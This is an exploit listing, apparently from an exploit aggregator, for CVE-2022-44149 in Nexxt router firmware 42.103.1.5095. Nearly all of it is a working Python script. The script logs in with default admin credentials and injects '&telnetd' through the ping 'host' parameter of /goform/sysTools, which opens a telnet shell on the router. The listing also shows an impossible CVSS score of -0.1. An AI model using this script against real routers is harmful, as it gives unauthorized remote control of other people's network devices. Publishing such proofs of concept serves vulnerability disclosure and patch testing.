Exploit for Nexxt Router Firmware 42.103.1.5095 Remote Code Execution CVE-2022-44149

Name: Exploit for Nexxt Router Firmware 42.103.1.5095 Remote Code Execution CVE-2022-44149
Rating: 5 (194 reviews)

2023-01-04 | CVSS -0.1

## https://sploitus.com/exploit?id=PACKETSTORM:170366
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)  
# Date: 19/10/2022  
# Exploit Author: Yerodin Richards  
# Vendor Homepage: https://www.nexxtsolutions.com/  
# Version: 42.103.1.5095  
# Tested on: ARN02304U8  
# CVE : CVE-2022-44149  
  
import requests  
import base64  
  
router_host = "http://192.168.1.1"  
username = "admin"  
password = "admin"  
  
  
def main():  
send_payload("&telnetd")  
print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials")  
pass  
  
def gen_header(u, p):  
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")  
  
def send_payload(payload):  
url = router_host+"/goform/sysTools"  
headers = {"Authorization": "Basic {}".format(gen_header(username, password))}  
params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"}  
requests.post(url, headers=headers, data=params)  
  
  
if __name__ == '__main__':  
main()